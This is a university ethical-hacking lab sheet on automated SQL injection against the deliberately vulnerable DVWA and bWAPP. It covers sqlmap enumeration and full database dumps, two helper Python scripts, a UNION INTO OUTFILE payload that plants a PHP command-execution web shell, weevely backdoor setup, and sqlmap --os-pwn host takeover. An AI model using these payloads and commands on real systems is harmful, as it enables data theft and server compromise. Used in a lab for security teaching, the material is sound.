17/03/2021
AUTOMATED SQL Injection
Ethical Hacking Lab Exercise
Section 1 :- Setup the Virtual Machines
Run the Bee-Box and the Kali (Web) virtual machines (using revert to
snapshot) and do the following exercises against DVWA.
Section 2 :- SQLMAP
sqlmap is an open-source, Python-based tool used by penetration testers to detect and
exploit SQL injection vulnerabilities during web application testing. It is very
effective and automates the query execution against the back-end database, so that
security testers can enumerate its structure and extract data from it without
crafting every payload by hand.
Getting help.
From Kali, open a terminal and type
For the short version of help,
sqlmap -h
For the full list of options (the advanced help),
sqlmap -hh
1.1 Easily getting the request file.
We will be exploiting the SQL injection flaw in Damn Vulnerable Web App
that we have previously examined manually. The initialisation values such as
the session cookie could be passed as command line options (--cookie). However,
it is easier to use a proxy, capture the whole request, save it to a file and
point sqlmap at that file on the command line.
Run OWASP ZAP from the menu Web Application Analysis. Note:
it is slow to start.
Run the web browser and point it at OWASP ZAP (localhost, port 8080):
Preferences | Advanced | Network, then select the Settings command
button.
Remember to clear the "No Proxy for" text box, otherwise requests to the
local DVWA address bypass the proxy and ZAP captures nothing.
C McLean School of Computing UAD Page 1 514733048.doc
In Kali, browse to http://192.168.1.100/dvwa/login.php and log in as
admin/password.
Set DVWA Security to Low
Browse to the SQL Injection page (the reflected one, not the blind one)
and enter 1 in the User ID box.
OWASP ZAP has now captured the request we require and we can paste
it into a text file.
Go to your desktop and create a file called dvwa.txt (right-click, New
Document).
Right-click it and Open with Leafpad.
In ZAP, double-click on the GET request for /dvwa/vulnerabilities/sqli/.
We must now copy ALL of the information contained in the Request tab
(request line, every header and the blank line after them) and paste it into
our dvwa.txt file. Note the test value being submitted (id=1) and the cookies
(PHPSESSID and security=low): sqlmap needs both, or DVWA will send it to the
login page or to a different security level instead of the vulnerable code.
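Before handing dvwa.txt to sqlmap it is worth checking that the paste actually contains what sqlmap -r needs. The following Python is an added example, not part of the lab sheet: it parses a raw request file in the format sqlmap reads and reports anything that would stop the DVWA low-security injection from being reachable. The sample request is constructed to look like a ZAP capture; the PHPSESSID value is made up.

```python
"""Sanity-check a raw HTTP request file before handing it to sqlmap -r.

Added example, not part of the original lab sheet. The sample request is
constructed to look like a ZAP capture of the DVWA SQLi page; the PHPSESSID
value is made up.
"""
from urllib.parse import urlsplit, parse_qsl

# Constructed sample of what gets pasted into dvwa.txt (not a real capture).
SAMPLE_REQUEST = (
    "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1\r\n"
    "Host: 192.168.1.100\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Cookie: security=low; PHPSESSID=0123456789abcdef0123456789\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)


def parse_raw_request(text):
    """Split a raw request into method, path, query params, headers and cookies.

    The file format is exactly what sqlmap -r reads: request line, header
    lines, a blank line, then an optional body (form parameters for POST).
    """
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    cookies = {}
    for item in headers.get("cookie", "").split(";"):
        key, _, value = item.strip().partition("=")
        if key:
            cookies[key] = value
    params = dict(parse_qsl(parts.query))
    if method == "POST" and body:
        params.update(dict(parse_qsl(body.strip())))
    return {"method": method, "path": parts.path, "params": params,
            "headers": headers, "cookies": cookies}


def request_file_problems(text):
    """Return the reasons sqlmap would not reach DVWA's low-security SQLi code path."""
    req = parse_raw_request(text)
    problems = []
    if "host" not in req["headers"]:
        problems.append("no Host header: sqlmap -r cannot build the target URL")
    if "PHPSESSID" not in req["cookies"]:
        problems.append("no PHPSESSID cookie: DVWA redirects to login.php")
    if req["cookies"].get("security") != "low":
        problems.append("security cookie is not 'low': the page handles id differently")
    if "id" not in req["params"]:
        problems.append("no id parameter: nothing for sqlmap to inject into")
    return problems


if __name__ == "__main__":
    print(parse_raw_request(SAMPLE_REQUEST))
    print(request_file_problems(SAMPLE_REQUEST) or "request file looks usable")
```

Run it against the real dvwa.txt by reading the file into `request_file_problems`; an empty list means the capture carries the session, the security level and the injectable parameter.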
Using sqlmap to interrogate a Web site.
We can now use sqlmap to interrogate the DVWA application and the
underlying database. As will be shown, everything in the MySQL database may
be grabbed, not just the DVWA database.
Note that the sqlmap switch -r reads the target request from our request file.
To identify the technology used by the web application and its database, we
use the fingerprint option -f.
sqlmap -r /root/Desktop/dvwa.txt -f
It should tell us that we are dealing with a MySQL database. To save time in
future runs, we tell sqlmap which DBMS it is facing using --dbms, so it skips
the tests for other database engines.
sqlmap -r /root/Desktop/dvwa.txt -f --dbms=MySQL
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL --current-user
Try the following switches: -
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
Browse to /usr/share/sqlmap/output (newer sqlmap releases write to
~/.local/share/sqlmap/output instead; the last line of every run, "fetched
data logged to text files under ...", gives the exact location) to see all
the information grabbed.
A systematic approach
sqlmap can take a long time (and even run into problems) if a systematic
approach is not used. Blindly specifying "get everything" is not generally a
good idea (note that the switches --dump-all or -a can be used at any point).
We will now take a systematic approach.
We would normally first need to determine the database names.
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL --dbs
We can then choose which database to interrogate
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -D dvwa --tables
We can then choose which table to interrogate
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -D dvwa -T users --columns
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -D dvwa -T users --dump
Only once the interesting tables are known is it worth asking for everything:
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL --all
Get everything and dump it into a folder. Run the following; --batch answers
every prompt with its default so the run needs no attention.
sqlmap -r /root/Desktop/dvwa.txt --dbms=MySQL -a --output-dir=/root/Desktop --batch
When it has finished, examine the folder that has been created on your
desktop: there is one sub-folder per target host, and the dumped tables sit
under its dump/ directory as one CSV file per table.
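The staged approach above is easy to script, and scripting it is how a tester avoids the "-a" trap on a large target: each stage's output decides what the next stage asks for, and system schemas are skipped. The following Python is an added example, not part of the lab sheet or of sqlmap: it builds the non-interactive sqlmap command lines, parses the database list and table list that sqlmap prints, and only under `__main__` shells out to the real sqlmap. The request-file and output-directory paths are assumptions, and the two sample outputs are constructed to match sqlmap's listing format rather than captured from a run.

```python
"""Drive sqlmap stage by stage instead of -a, feeding each result into the next stage.

Added example, not part of the lab sheet or of sqlmap itself. It runs the real
sqlmap only under __main__; the parsing functions are exercised on constructed
sample output. REQUEST_FILE and OUTPUT_DIR are assumed paths.
"""
import re
import subprocess

REQUEST_FILE = "/root/Desktop/dvwa.txt"   # request captured with ZAP (assumed path)
OUTPUT_DIR = "/root/Desktop/sqlmap-out"   # where dumps should land (assumed path)
# MySQL system schemas: enumerating them costs time and rarely yields application data.
SKIP_DBS = {"information_schema", "mysql", "performance_schema", "sys"}


def sqlmap_cmd(*extra):
    """Build a non-interactive sqlmap argv for this target; --batch takes every default."""
    return ["sqlmap", "-r", REQUEST_FILE, "--dbms=MySQL", "--batch",
            "--output-dir=" + OUTPUT_DIR, *extra]


def parse_dbs(output):
    """Pull database names out of --dbs output: 'available databases [N]:' then '[*] name' lines."""
    return re.findall(r"^\[\*\] (\S+)\s*$", output, re.MULTILINE)


def parse_tables(output):
    """Pull table names out of --tables output, which sqlmap prints as an ASCII box per database."""
    return [m.group(1) for m in re.finditer(r"^\| (\S+)\s*\|$", output, re.MULTILINE)]


def plan(dbs_output):
    """Given the --dbs output, return the --tables argv for each non-system database."""
    return [sqlmap_cmd("-D", db, "--tables")
            for db in parse_dbs(dbs_output) if db not in SKIP_DBS]


def run(argv):
    """Run one sqlmap stage and return its stdout as text."""
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


# Constructed samples of what sqlmap prints for --dbs and for -D dvwa --tables (not real captures).
SAMPLE_DBS_OUTPUT = """\
[12:00:01] [INFO] fetching database names
available databases [2]:
[*] dvwa
[*] information_schema
"""
SAMPLE_TABLES_OUTPUT = """\
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
"""

if __name__ == "__main__":
    # dbs -> tables -> columns -> dump, one database and one table at a time.
    for tables_cmd in plan(run(sqlmap_cmd("--dbs"))):
        db = tables_cmd[tables_cmd.index("-D") + 1]
        for table in parse_tables(run(tables_cmd)):
            run(sqlmap_cmd("-D", db, "-T", table, "--columns"))
            run(sqlmap_cmd("-D", db, "-T", table, "--dump"))
```

Because every stage carries --batch and the same --output-dir, the script leaves the same per-host folder structure as the manual commands, and an interrupted run can be restarted without re-answering sqlmap's prompts.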
Uploading and accessing a PHP shell.
sqlmap does not give us a shell against bWAPP on the bee-box virtual machine,
but MySQL's INTO OUTFILE can write a file anywhere the mysqld process user has
write access. From previous tests, it is found that /var/www/bWAPP/documents is
writeable. So try the following injection against the first SQL injection
exercise (the union must supply the same seven columns as the original query,
hence the seven values):
blah' union select 1,"<?php echo '<pre>';system($_REQUEST['cmd']);echo '</pre>'; ?>",1,1,1,1,1 into outfile "/var/www/bWAPP/documents/shell1.php"--
The file is written by the database server, not by PHP, so three things must
hold: the DBMS user needs the FILE privilege, secure_file_priv must not restrict
the target directory, and the file must not already exist (INTO OUTFILE never
overwrites). If the write fails silently, check those first. If MySQL rejects
the trailing comment, use "-- " with a space after it, or "#".
Now you should be able to browse to the page and issue shell commands through
the cmd parameter the PHP reads from $_REQUEST, for example
documents/shell1.php?cmd=ls
weevely depends on PySocks, which may be missing on the lab image. To install it:
1) Download the latest PySocks from the Python package index
https://pypi.python.org/pypi/PySocks/
2) Unzip the archive into the /tmp/ directory
3) Run "chmod 755 /tmp/PySocks/setup.py"
4) Run the build: "/tmp/PySocks/setup.py build"
5) Run the install: "/tmp/PySocks/setup.py install"
Now you can connect to your backdoor from weevely. Note that weevely only talks
to an agent it generated itself, not to shell1.php: create one with
"weevely generate <password> /root/agent.php", upload it the same way as
shell1.php (or fetch it onto the box through shell1.php's cmd parameter), then
connect with "weevely http://<target>/bWAPP/documents/agent.php <password>".
Try to get a shell using weevely under Kali Linux.
The following tutorial may help.
https://evilzone.org/tutorials/upload-shell-with-sql-injection/
APPENDIX: Owning the machine
sqlmap can also try to take over the host itself. This is not restricted to
Windows targets, but it needs Metasploit installed on Kali and a DBMS user that
can write files (on MySQL, the FILE privilege again), so it will not succeed
against every lab machine. To get a command prompt on the remote machine, use
the following switch.
--os-pwn Prompt for an OOB shell, meterpreter or VNC
Use the defaults until you are asked the following, then choose 2 - Shell
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC